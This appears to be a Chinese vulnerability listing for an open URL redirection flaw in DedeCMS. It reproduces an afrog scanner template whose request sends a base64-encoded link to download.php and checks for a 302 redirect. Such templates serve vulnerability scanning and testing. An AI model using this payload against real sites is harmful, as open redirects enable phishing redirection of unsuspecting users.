dedecms-url-redirection: DedeCMS URL Redirection

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

DedeCMS URL Redirection

PoC代码[已公开]

id: dedecms-url-redirection

info:
  name: DedeCMS URL Redirection
  author: cc_ci
  severity: low
  description: |-
    DedeCMS URL Redirection
  tags: dedecms,url-redirection
  created: 2023/08/13

rules:
  r0:
    request:
      method: GET
      path: /plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D
    expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com"
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dedecms-url-redirection.yaml